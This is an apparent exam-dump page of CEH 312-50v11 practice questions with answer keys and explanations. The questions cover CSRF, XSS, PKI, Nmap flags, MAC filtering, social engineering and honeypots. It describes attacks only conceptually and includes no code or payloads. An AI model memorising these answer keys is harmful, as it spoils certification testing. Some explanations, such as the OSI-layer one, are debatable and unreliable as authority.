312-50v11 ECCouncil Exam Dumps & Practice Test Questions
A user was logged into their online banking session when they clicked a link in an email that took them to a cat video. Shortly after, they received a message from their bank alerting them to suspicious account activity.
What browser security vulnerability was most likely exploited?
A. Clickjacking
B. Cross-Site Scripting
C. Cross-Site Request Forgery
D. Web Form Input Validation
Correct Answer: C
Explanation:
This scenario highlights a stealthy browser-based attack where the user performs a seemingly harmless action—clicking on a link—only to later discover that their bank account has been accessed without their knowledge. The key here is recognizing that the user was already authenticated with their bank and that unauthorized actions occurred without additional user interaction after visiting another site. This points directly to Cross-Site Request Forgery (CSRF) as the exploited vulnerability.
CSRF takes advantage of the trust a website (such as a bank) has in the user’s browser. When a user logs into their banking site, an authentication session cookie is stored in the browser. If the user visits a malicious site while this session is still active, the malicious site can send forged HTTP requests to the banking site. Since the browser automatically includes the session cookie in the request, the bank believes the request is legitimate—even though the user never knowingly authorized it.
In this case:
The user clicked a link to watch a cat video hosted on a malicious or compromised site.
That site included hidden elements, such as an invisible form or script, that silently submitted a transaction to the bank using the user’s active session.
As a result, a transaction was completed without the user’s knowledge.
Now, let’s evaluate the incorrect options:
A. Clickjacking involves tricking the user into clicking something they didn’t intend to by overlaying transparent frames. This attack requires deliberate user interaction, which wasn’t the case here.
B. Cross-Site Scripting (XSS) is an injection attack where malicious JavaScript runs on a vulnerable website. This would require a flaw in the bank’s website, which the scenario doesn’t indicate.
D. Web Form Input Validation focuses on protecting websites from incorrect or malicious data input, often relevant to SQL injection or XSS. It is unrelated to unauthorized requests from a third-party site.
The scenario clearly illustrates how CSRF allows attackers to exploit a logged-in session through a secondary website, leading to unintended actions on behalf of the user. It’s subtle, browser-based, and perfectly matches the described behavior.
Within the structure of a Public Key Infrastructure (PKI), which component is tasked with verifying and certifying the identity of individuals or organizations before issuing digital certificates?
A. KDC
B. CR
C. CBC
D. CA
Correct Answer: D
Explanation:
Public Key Infrastructure (PKI) is a framework that manages digital certificates and public-key encryption. Its goal is to secure digital communications by confirming the identity of users, servers, and devices, and by enabling encrypted communication. At the center of PKI is the Certificate Authority (CA), the entity responsible for verifying identities and issuing certificates that bind public keys to specific individuals or organizations.
The CA acts as a trusted third party. Before issuing a certificate, it conducts a verification process appropriate to the certificate’s type. For Domain Validation (DV), it checks domain ownership. For Organization Validation (OV) and Extended Validation (EV), it performs more rigorous background checks to confirm legal identity and business credentials. Once verified, the CA signs the certificate with its private key. This digital signature allows anyone to verify its authenticity using the CA’s public key.
The certificate contains key information such as:
The subject (owner) of the certificate
The public key of the subject
The validity period
The issuer (the CA)
The digital signature of the CA
When a web browser encounters a certificate during an HTTPS session, it checks the certificate’s validity and whether it was signed by a trusted CA. If valid, secure communication proceeds using the public key for encryption.
Let’s consider why the other options are incorrect:
A. KDC (Key Distribution Center) is part of the Kerberos authentication protocol, not PKI. It issues session keys, not digital certificates, and does not perform identity verification for certificates.
B. CR (likely intended to reference CRL, or Certificate Revocation List) is a mechanism within PKI to invalidate certificates before expiration. It helps manage certificate trust but does not issue or verify identities.
C. CBC (Cipher Block Chaining) is a mode of encryption, used with symmetric block ciphers like AES. It has no function in identity verification or certificate management.
In short, the CA is the authoritative source in a PKI system that ensures digital certificates are issued only after a thorough identity verification process, helping users establish secure and trusted communications across the internet.
Which kind of web attack targets users by inserting malicious scripts into dynamic web content, leading those scripts to be executed in the browsers of unsuspecting visitors?
A. LDAP Injection
B. Cross-Site Scripting (XSS)
C. SQL Injection
D. Cross-Site Request Forgery (CSRF)
Correct Answer: B
Cross-Site Scripting (XSS) is a type of web application vulnerability that allows attackers to inject malicious client-side scripts—typically JavaScript—into content that is later rendered in other users’ web browsers. This attack exploits websites that dynamically generate content without properly sanitizing user inputs.
There are several variations of XSS:
Stored XSS: The malicious script is permanently stored on the server (e.g., in a database) and delivered to users each time they visit a particular page.
Reflected XSS: The script is reflected back immediately in the web server’s response (e.g., via a query string or form submission).
DOM-based XSS: The script’s behavior is handled entirely on the client side, leveraging the Document Object Model (DOM) and vulnerable JavaScript code.
In all cases, the script runs in the context of a trusted website and can do things like steal session cookies, log keystrokes, or redirect users to phishing pages. What makes XSS especially dangerous is that it does not rely on the server being directly attacked—it instead exploits the trust users have in a legitimate website.
Let’s look at why the other options don’t apply:
A. LDAP Injection: This attack exploits vulnerabilities in LDAP queries, not in client browsers. It's used for unauthorized access or query manipulation in directory services like Active Directory.
C. SQL Injection: SQLi allows attackers to manipulate database queries, potentially gaining access to or modifying backend data. It’s a server-side attack and doesn't involve injecting scripts into pages for browser execution.
D. Cross-Site Request Forgery (CSRF): CSRF tricks a user into performing actions without their knowledge on a site where they are authenticated. It relies on the user's existing session, not on script injection.
In conclusion, only XSS matches the scenario described—injecting code that runs in the browser of other users. It targets the presentation layer of web applications and often results in theft of credentials or sensitive data.
If a user encrypts an email using PKI so that only the recipient can decrypt it, at which layer of the OSI model does this encryption and decryption take place?
A. Application
B. Transport
C. Session
D. Presentation
Correct Answer: A
This question addresses the use of Public Key Infrastructure (PKI) to secure email communications, specifically focusing on the OSI layer where encryption and decryption take place. When a user secures an email with PKI, it usually involves encrypting the content at the software (application) level using the recipient’s public key, ensuring only the recipient—with the corresponding private key—can decrypt it.
In this context, the Application layer of the OSI model is where this action occurs. This layer is responsible for end-user services like email, file transfer, and web browsing. When an email is sent using encryption protocols such as S/MIME or PGP, the encryption is handled directly by the email client, such as Outlook or Thunderbird. That client uses PKI to secure the message before it even reaches the network. The recipient’s client then performs decryption once the email is received.
Let’s analyze the incorrect options:
B. Transport: This layer is responsible for data transmission reliability using protocols like TCP and UDP. While TLS encryption may operate here to secure channels (e.g., HTTPS), it doesn’t encrypt the actual content of the message—only the data stream in transit.
C. Session: This layer manages sessions or connections between applications. While it can play a role in initiating secure communications, the actual encryption and decryption of data is not performed here.
D. Presentation: This layer is sometimes responsible for data transformation functions like encryption and compression, but in modern architectures, application-level tools handle these processes directly, especially when using PKI-based systems like S/MIME.
Ultimately, since encryption and decryption in this scenario are performed by the email application itself, and are tied to user actions and software interfaces, the correct layer is the Application layer. This matches how modern secure email communication functions in real-world implementations.
Therefore, the correct answer is A.
A newly added wireless device can detect an 802.11 Wi-Fi network but fails to connect to it. Packet capture shows that the Access Point is ignoring the association requests sent by the device.
The same setup works for other similar clients. What is the most likely cause of this behavior?
A. The Access Point does not recognize the client's MAC address
B. The client cannot detect the SSID of the network
C. The client is tuned to the incorrect wireless channel
D. The client is not configured to obtain an IP address via DHCP
Correct Answer: A
This scenario revolves around a wireless client that can detect the network but cannot establish a connection, even though other identical clients are functioning properly. Importantly, packet sniffing reveals that the Access Point (AP) is not replying to association requests, which is a crucial clue.
This behavior typically indicates that the client is actively attempting to associate, meaning it has successfully detected the SSID and is on the correct frequency/channel. However, the AP is ignoring or rejecting the association request, which implies a deliberate decision by the AP not to allow the client to join.
The most common reason for this is MAC address filtering, making Option A the correct choice. When MAC filtering is enabled on the WAP, only pre-approved MAC addresses are allowed to connect. Devices not on the allowed list will have their requests dropped silently—even though they can see the network and attempt to connect. This kind of filtering adds a layer of access control and is often used in corporate or high-security environments.
Let’s examine why the other options are incorrect:
Option B: If the client couldn’t see the SSID, it wouldn’t even attempt to associate unless manually configured. Since it’s actively sending association requests, this clearly isn’t the issue.
Option C: Being on the wrong channel would prevent the client from detecting the network entirely. Again, the fact that it sees the SSID and sends requests rules this out.
Option D: DHCP is involved after the association and authentication stages. If DHCP were misconfigured, the client would connect but fail to obtain a valid IP address. It would not stop the AP from replying to association attempts.
In conclusion, the most plausible explanation is that the Access Point is deliberately refusing the connection because the client’s MAC address is not included in its allowlist. This explains why other clients work (they are on the list), while the new one does not.
You are using the Nmap tool to scan a system for open ports, but you want to scan fewer ports than the default for a faster result. Which Nmap option allows you to perform this limited, faster scan?
A. -r
B. -F
C. -P
D. -sP
Correct Answer: B
Nmap is a well-known network scanning tool used by security professionals to identify open ports, services, and vulnerabilities. By default, when you run a basic scan, Nmap checks the 1,000 most commonly used ports to balance thoroughness and performance.
However, there are scenarios—like routine network maintenance or time-constrained audits—where you may want to speed up the scan by reducing the number of ports it checks. This is where the -F option becomes valuable.
The -F flag stands for Fast scan. When used, it tells Nmap to scan only the most common ports listed in the nmap-services file, which typically includes about 100 ports. This results in a much quicker scan compared to the default 1,000-port sweep.
Let’s review the other options and why they are incorrect:
Option A (-r): This option disables Nmap’s default randomization of the port scanning sequence. While it changes the order in which ports are scanned, it does not reduce the number of ports being scanned.
Option C (-P): This is not a valid standalone Nmap switch. There are related flags like -PE, -PP, and -PS, which are used for host discovery (ping scans), not port scans. None of these reduce the port scan count.
Option D (-sP): This used to be the flag for a ping scan (now replaced by -sn). It tells Nmap to only discover hosts without scanning any ports at all. While this does reduce scan time, it does not fulfill the requirement of scanning fewer ports—it actually skips port scanning entirely.
Therefore, if your goal is to perform a quicker scan that still checks for open ports, the correct and most efficient choice is -F. It’s a practical and commonly used flag for fast scanning in time-sensitive or low-bandwidth environments.
Which structure is used specifically to confirm and verify the identity of individuals involved in data communication within an organization?
A. SOA
B. Biometrics
C. Single Sign-On
D. PKI
Correct Answer: D
Explanation:
The most accurate and complete solution for securely verifying the identity of individuals during digital communication is PKI (Public Key Infrastructure). PKI is not just a simple tool—it is a comprehensive framework that supports secure information exchange by authenticating identities using cryptographic keys and digital certificates.
At its core, PKI works by issuing digital certificates that bind a user’s identity to a cryptographic public key. These certificates are verified and managed by Certificate Authorities (CAs), which act as trusted third parties. If someone receives data from a digitally signed message, they can verify the sender’s identity by confirming the certificate was issued by a trusted CA and has not been revoked.
Key PKI components include:
Public/private key pairs – Individuals hold private keys securely and share public keys via certificates.
Certificate Authority (CA) – Validates identity and issues digital certificates.
Registration Authority (RA) – Assists in identity verification before certificate issuance.
Digital Certificates – Contain identity information, public keys, and validity.
Certificate Revocation Lists (CRLs) – Used to invalidate certificates when necessary.
Now, let’s assess the incorrect options:
A. SOA (Service-Oriented Architecture):
This is a software design principle, not a security framework. It promotes interoperability among services but does not include identity authentication mechanisms like PKI does.
B. Biometrics:
While biometrics are effective authentication mechanisms (e.g., fingerprint, facial recognition), they are not part of a full cryptographic system for verifying identity over networks. They can complement a PKI system but cannot replace its structure or scope.
C. Single Sign-On (SSO):
SSO simplifies user access across multiple applications by requiring only one login. However, it depends on authentication technologies like PKI or Kerberos to function securely. It is an access method, not a full framework for identity verification across data exchanges.
In conclusion, PKI provides the full-stack cryptographic infrastructure necessary for verifying identities in secure digital communications. It is a trusted standard for securing websites (HTTPS), authenticating emails (S/MIME), signing software, and much more.
During a penetration test, you impersonate an executive in an email to the receptionist, trick her into sending a document, modify it with malicious links, and get her to click on them—resulting in a system compromise.
What attack method does this represent?
A. Social Engineering
B. Piggybacking
C. Tailgating
D. Eavesdropping
Correct Answer: A
Explanation:
The situation described is a textbook case of social engineering, a form of attack where the adversary manipulates human behavior to gain unauthorized access to systems or data. In penetration testing, this method tests not just technical safeguards but also the human element of security.
Here’s the breakdown of the steps:
Reconnaissance – The attacker locates employee information (email, position) via public resources.
Impersonation (Spoofing) – An email is sent to the receptionist pretending to be from her boss—a common authority-based tactic.
Deception & Payload Delivery – The legitimate PDF is returned, modified to include malicious links. This alteration is masked under plausible instructions.
User Action – The receptionist, trusting the sender, clicks the links—resulting in malware execution and system access.
This demonstrates psychological manipulation, relying on trust, urgency, or obedience to authority, rather than brute force or technical vulnerabilities.
Let’s rule out the incorrect choices:
B. Piggybacking:
This involves gaining physical access by entering a secure area with consent from an authorized person. It’s a physical attack, not digital.
C. Tailgating:
Similar to piggybacking, but occurs without consent—such as sneaking through a secure door behind someone. Again, this is about physical intrusion, unrelated to email or malware.
D. Eavesdropping:
This refers to intercepting private communications such as phone calls, voice transmissions, or unencrypted network traffic. It is a passive attack and doesn’t involve tricking someone into clicking or executing code.
The scenario is entirely based on human manipulation via email, exploiting trust to trigger a technical compromise. This perfectly fits the definition of social engineering—a top concern in both cybersecurity training and red team operations.
Which of the following types of scanning focuses specifically on identifying open ports and services running on a target system?
A. Vulnerability scanning
B. Port scanning
C. Network mapping
D. Banner grabbing
Correct Answer: B
Explanation:
In ethical hacking, different scanning techniques are used to gather intelligence about a target system. One of the foundational scanning methods is port scanning, which is crucial for identifying which ports on a target machine are open and what services are running on those ports. This activity is part of the Reconnaissance and Scanning phases of the ethical hacking methodology.
Port scanning is typically performed using tools like Nmap, Masscan, or Netcat. These tools send packets to specific ports on a system to check if they are open (accepting connections), closed (rejecting connections), or filtered (protected by a firewall). The goal is to enumerate possible entry points that an attacker—or an ethical hacker—can further investigate for vulnerabilities.
Let’s examine the other options:
A: Vulnerability scanning involves checking systems for known vulnerabilities, such as outdated software, misconfigurations, or missing patches. While it may include port scanning as a preliminary step, its primary focus is identifying weaknesses rather than open ports.
C: Network mapping (or network discovery) is about creating a visual or logical map of a network's topology, showing how hosts are interconnected. It may involve ping sweeps and traceroutes but doesn’t necessarily scan ports in detail.
D: Banner grabbing is a technique used after identifying open ports. It involves connecting to services and capturing banners (text messages returned by services), which may reveal software versions and other information useful for further analysis.
In summary, while all these techniques have their place in a penetration test, port scanning is the specific process used to identify open ports and services, which is often a precursor to deeper vulnerability assessments. Understanding this distinction is crucial for passing the CEH exam and for performing responsible, accurate ethical hacking.
What is the primary purpose of using a honeypot in a cybersecurity environment?
A. To prevent phishing attacks
B. To accelerate network performance
C. To detect, lure, and analyze attackers
D. To automatically block malware at the firewall
Correct Answer: C
Explanation:
A honeypot is a security mechanism designed to appear as a legitimate part of the network but is actually a decoy system meant to attract attackers. Its core purpose is to detect, deceive, and analyze unauthorized access attempts in order to gather intelligence on malicious activities.
When deployed correctly, a honeypot simulates a vulnerable service, application, or server. Attackers who stumble upon it may assume it’s a real target and attempt to exploit it. Meanwhile, the system records all their actions—such as payloads used, IP addresses, and techniques attempted—without putting actual production data at risk.
Let’s evaluate the incorrect answers:
A: To prevent phishing attacks
Phishing is a form of social engineering that targets users rather than systems. While a honeypot may record phishing attempts if configured for that purpose, its main objective is not phishing prevention.
B: To accelerate network performance
This has nothing to do with honeypots. Performance optimization involves quality of service (QoS), load balancing, or content delivery networks (CDNs)—not honeypots.
D: To automatically block malware at the firewall
Firewalls and intrusion prevention systems (IPS) perform automated blocking. Honeypots, on the other hand, are passive tools. They monitor and log data, but do not automatically block attacks. Their goal is insight, not prevention.
By analyzing interactions with the honeypot, security teams can identify new threats, evaluate attacker behavior, and improve defenses. This intelligence is particularly useful in understanding zero-day exploits or new malware strains.
For the CEH exam, it's important to recognize that honeypots are intelligence-gathering tools, not active defense mechanisms. Their role is to lure attackers, observe them in a controlled environment, and collect data that informs better threat mitigation strategies.
Top ECCouncil Certification Exams
Site Search:
SPECIAL OFFER: GET 10% OFF
Pass your Exam with ExamCollection's PREMIUM files!
SPECIAL OFFER: GET 10% OFF
Use Discount Code:
MIN10OFF
A confirmation link was sent to your e-mail.
Please check your mailbox for a message from support@examcollection.com and follow the directions.
Download Free Demo of VCE Exam Simulator
Experience Avanset VCE Exam Simulator for yourself.
Simply submit your e-mail address below to get started with our interactive software demo of your free trial.